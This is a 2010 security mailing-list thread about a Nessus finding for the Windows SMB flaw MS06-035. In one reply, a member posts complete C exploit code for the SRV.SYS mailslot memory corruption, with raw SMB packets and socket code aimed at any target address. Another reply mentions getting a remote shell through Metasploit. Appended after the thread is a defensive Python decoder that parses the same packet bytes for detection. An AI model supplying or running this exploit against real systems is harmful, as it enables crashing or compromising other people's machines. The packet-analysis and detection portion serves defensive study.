Along the same lines, there is another CRITICAL vulnerability in SMB which allows Remote Code Execution.
MS10-012: Vulnerabilities in SMB Could Allow Remote Code Execution

Even if you are unable to trigger MS06-035, this has more chances of getting triggered.

Cheers,
0xN41K

On Fri, Jul 9, 2010 at 1:32 AM, Sandeep Thakur <[email protected]> wrote:
> Exploit code for you. Try it for knowledge purposes. Do not harm anyone by
> this...
>
> ----------start of code-------------
>
> #include <stdio.h>
> #include <windows.h>
> #include <winsock.h>
>
> /*******************************************************************
> Microsoft SRV.SYS Mailslot Ring0 Memory Corruption(*MS06-035*) *Exploit*
>
> by cocoruder(frankruder_at_hotmail.com),2006.7.19
> page:http://ruder.cdut.net
> *******************************************************************/
>
> unsigned char SmbNeg[] =
> "\x00\x00\x00\x2f\xff\x53\x4d\x42\x72\x00"
> "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
> "\x00\x00\x00\x00\x88\x05\x00\x00\x00\x00\x00\x0c\x00\x02\x4e\x54"
> "\x20\x4c\x4d\x20\x30\x2e\x31\x32\x00";
>
> unsigned char Session_Setup_AndX_Request[]=
> "\x00\x00\x00\x48\xff\x53\x4d\x42\x73\x00"
> "\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
> "\x00\x00\xff\xff\x88\x05\x00\x00\x00\x00\x0d\xff\x00\x00\x00\xff"
> "\xff\x02\x00\x88\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
> "\x00\x01\x00\x00\x00\x0b\x00\x00\x00\x6e\x74\x00\x70\x79\x73\x6d"
> "\x62\x00";
>
> unsigned char TreeConnect_AndX_Request[]=
> "\x00\x00\x00\x58\xff\x53\x4d\x42\x75\x00"
> "\x00\x00\x00\x18\x07\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
> "\x00\x00\x00\x00\xff\xfe\x00\x08\x00\x03\x04\xff\x00\x58\x00\x08"
> "\x00\x01\x00\x2d\x00\x00\x5c\x00\x5c\x00\x31\x00\x37\x00\x32\x00"
> "\x2e\x00\x32\x00\x32\x00\x2e\x00\x35\x00\x2e\x00\x34\x00\x36\x00"
> "\x5c\x00\x49\x00\x50\x00\x43\x00\x24\x00\x00\x00\x3f\x3f\x3f\x3f"
> "\x3f\x00";
>
> unsigned char Trans_Request[]=
> "\x00\x00\x00\x56\xff\x53\x4d\x42\x25\x00"
> "\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
> "\x00\x00\x00\x08\x88\x05\x00\x08\x00\x00\x11\x00\x00\x01\x00\x00"
> "\x04\xe0\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x55"
> "\x00\x01\x00\x55\x00\x03\x00\x01\x00\x00\x00\x00\x00\x11\x00\x5c"
> "\x4d\x41\x49\x4c\x53\x4c\x4f\x54\x5c\x4c\x41\x4e\x4d\x41\x4e\x41";
>
> unsigned char recvbuff[2048];
>
> void neg ( int s )
> {
>     char response[1024];
>
>     memset(response,0,sizeof(response));
>
>     send(s,(char *)SmbNeg,sizeof(SmbNeg)-1,0);
> }
>
> void main(int argc,char **argv)
> {
>     struct sockaddr_in server;
>     SOCKET sock;
>     DWORD ret;
>     WSADATA ws;
>
>     WORD userid,treeid;
>
>     WSAStartup(MAKEWORD(2,2),&ws);
>
>     sock = socket(AF_INET,SOCK_STREAM,0);
>     if(sock<=0)
>     {
>         return;
>     }
>
>     server.sin_family = AF_INET;
>     server.sin_addr.s_addr = inet_addr(argv[1]);
>     server.sin_port = htons((USHORT)atoi(argv[2]));
>
>     ret=connect(sock,(struct sockaddr *)&server,sizeof(server));
>
>     if (ret==-1)
>     {
>         printf("connect error!\n");
>         return;
>     }
>
>     neg(sock);
>
>     recv(sock,(char *)recvbuff,sizeof(recvbuff),0);
>
>     ret=send(sock,(char *)Session_Setup_AndX_Request,sizeof(Session_Setup_AndX_Request)-1,0);
>
>     if (ret<=0)
>     {
>         printf("send Session_Setup_AndX_Request error!\n");
>         return;
>     }
>     recv(sock,(char *)recvbuff,sizeof(recvbuff),0);
>
>     userid=*(WORD *)(recvbuff+0x20); //get userid
>
>     memcpy(TreeConnect_AndX_Request+0x20,(char *)&userid,2); //update userid
>
>     ret=send(sock,(char *)TreeConnect_AndX_Request,sizeof(TreeConnect_AndX_Request)-1,0);
>     if (ret<=0)
>     {
>         printf("send TreeConnect_AndX_Request error!\n");
>         return;
>     }
>     recv(sock,(char *)recvbuff,sizeof(recvbuff),0);
>
>     treeid=*(WORD *)(recvbuff+0x1c); //get treeid
>
>     memcpy(Trans_Request+0x20,(char *)&userid,2); //update userid
>     memcpy(Trans_Request+0x1c,(char *)&treeid,2); //update treeid
>
>     ret=send(sock,(char *)Trans_Request,sizeof(Trans_Request)-1,0);
>
>     if (ret<=0)
>     {
>         printf("send Trans_Request error!\n");
>         return;
>     }
>     recv(sock,(char
>     *)recvbuff,sizeof(recvbuff),0);
> }
>
> ---------end of code---------------
>
> Regards
> Sandeep Thakur
>
> On Thu, Jul 8, 2010 at 11:04 AM, Ravi Gopal <[email protected]> wrote:
>
>> Hi,
>>
>> Through the Metasploit framework it is very easy to exploit this vulnerability
>> MS06-035.
>> You can get the shell (command prompt) of the remote system depending on
>> the payload selected in Metasploit.
>>
>> Please note that, similar to other tools, Nessus is not an exception in
>> reporting false positives. So please confirm the vulnerability before
>> reporting it to the client. Windows XP Service Pack 2 is vulnerable but not
>> Service Pack 3. So if somebody scans an XP system with SP3, Nessus still
>> reports this vulnerability.
>>
>> I hope this helps.
>>
>> Happy exploitation.
>>
>> Regards,
>> Ravi Gopal
>>
>> On Thu, Jul 8, 2010 at 4:28 PM, Sandeep Thakur <[email protected]> wrote:
>>
>>> It seems you have run Nessus on your Windows XP operating system.
>>> However, please refer to MS06-035: Vulnerability in Server Service Could
>>> Allow Remote Code Execution (917159) (uncredentialed check)
>>>
>>> http://www.microsoft.com/technet/security/bulletin/ms06-035.mspx
>>>
>>> Regards
>>> Sandeep Thakur
>>> On Thu, Jul 8, 2010 at 1:16 AM, Old Chick <[email protected]> wrote:
>>>
>>>> Hello Friends,
>>>>
>>>> I am trying to work on Nessus and I found a vulnerability like
>>>> this.
>>>>
>>>> Can we discuss these?
>>>> Synopsis
>>>> Arbitrary code can be executed on the remote host due to a flaw in the
>>>> 'Server' service.
>>>>
>>>> Description
>>>> The remote host is vulnerable to a heap overflow in the 'Server' service
>>>> that may allow an attacker to execute arbitrary code on the remote
>>>> host with 'SYSTEM' privileges.
>>>>
>>>> In addition to this, the remote host is also affected by an
>>>> information disclosure vulnerability in SMB that may allow an attacker
>>>> to obtain portions of the memory of the remote host.
>>>>
>>>> Thank you
>>>> Oldchic
>>>>
>>>> --
>>>> You received this message because you are subscribed to the Google
>>>> Groups "nforceit" group.
>>>> To post to this group, send an email to [email protected].
>>>> To unsubscribe from this group, send email to
>>>> [email protected]<nforceit%[email protected]>
>>>> .
>>>> For more options, visit this group at
>>>> http://groups.google.com/group/nforceit?hl=en-GB.
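As an added example (not part of the thread and not cocoruder's code), here is a Python decoder for the SMB1 packets quoted above, fed with the Trans_Request bytes copied from the PoC: it reads the NetBIOS session header and the 32-byte SMB header, names the command, and for SMB_COM_TRANSACTION pulls out the mailslot name, the setup words and the declared offsets and checks them against the packet, which is the parsing a detection rule or packet-inspection tool needs to recognise this traffic. Field layout and command codes follow MS-CIFS; the command table covers only the four requests the PoC sends.

```python
import struct

SMB_MAGIC = b"\xffSMB"
# SMB1 command codes of the four requests quoted in the thread (MS-CIFS values)
SMB_COMMANDS = {0x72: "SMB_COM_NEGOTIATE", 0x73: "SMB_COM_SESSION_SETUP_ANDX",
                0x75: "SMB_COM_TREE_CONNECT_ANDX", 0x25: "SMB_COM_TRANSACTION"}

# Sample input: the Trans_Request array exactly as quoted in the thread above
TRANS_REQUEST = (
    b"\x00\x00\x00\x56\xff\x53\x4d\x42\x25\x00"
    b"\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    b"\x00\x00\x00\x08\x88\x05\x00\x08\x00\x00\x11\x00\x00\x01\x00\x00"
    b"\x04\xe0\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x55"
    b"\x00\x01\x00\x55\x00\x03\x00\x01\x00\x00\x00\x00\x00\x11\x00\x5c"
    b"\x4d\x41\x49\x4c\x53\x4c\x4f\x54\x5c\x4c\x41\x4e\x4d\x41\x4e\x41"
)

def parse_smb1(pkt):
    """Decode NetBIOS session header + SMB1 header; for SMB_COM_TRANSACTION
    also decode the request block and sanity-check the declared lengths."""
    if len(pkt) < 36 or pkt[0] != 0x00:
        raise ValueError("not a NetBIOS session message")
    smb = pkt[4:]                                   # SMB header starts after NetBIOS
    if smb[:4] != SMB_MAGIC:
        raise ValueError("missing SMB signature")
    cmd, status, flags, flags2 = struct.unpack_from("<BIBH", smb, 4)
    tid, pid, uid, mid = struct.unpack_from("<HHHH", smb, 24)   # TID/PID/UID/MID
    info = {"netbios_len_ok": int.from_bytes(pkt[1:4], "big") == len(smb),
            "command": SMB_COMMANDS.get(cmd, "0x%02x" % cmd),
            "status": status, "tid": tid, "pid": pid, "uid": uid, "mid": mid}
    if cmd != 0x25:
        return info
    wct = smb[32]                                   # WordCount
    # Fixed 14-word part of the SMB_COM_TRANSACTION request (MS-CIFS layout)
    (_, _, _, _, _, _, _, _, _, param_count, param_off, data_count, data_off,
     setup_count, _) = struct.unpack_from("<HHHHBBHIHHHHHBB", smb, 33)
    setup = struct.unpack_from("<%dH" % setup_count, smb, 61)  # opcode, priority, class
    bcc_pos = 33 + 2 * wct
    bcc = struct.unpack_from("<H", smb, bcc_pos)[0]  # ByteCount
    region = smb[bcc_pos + 2: bcc_pos + 2 + bcc]     # bytes ByteCount claims to cover
    nul = region.find(b"\x00")                       # name should be NUL-terminated
    name = region if nul < 0 else region[:nul]
    info.update({"name": name.decode("latin-1"), "name_terminated": nul >= 0,
                 "setup": setup, "bytecount_ok": len(region) == bcc,
                 "data_in_packet": data_off + data_count <= len(smb),
                 "params_in_packet": param_off + param_count <= len(smb)})
    return info
```

Calling `parse_smb1(TRANS_REQUEST)` shows a mailslot write (setup opcode 1) to a name that is not NUL-terminated inside ByteCount, the kind of anomaly a signature for this traffic can key on.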
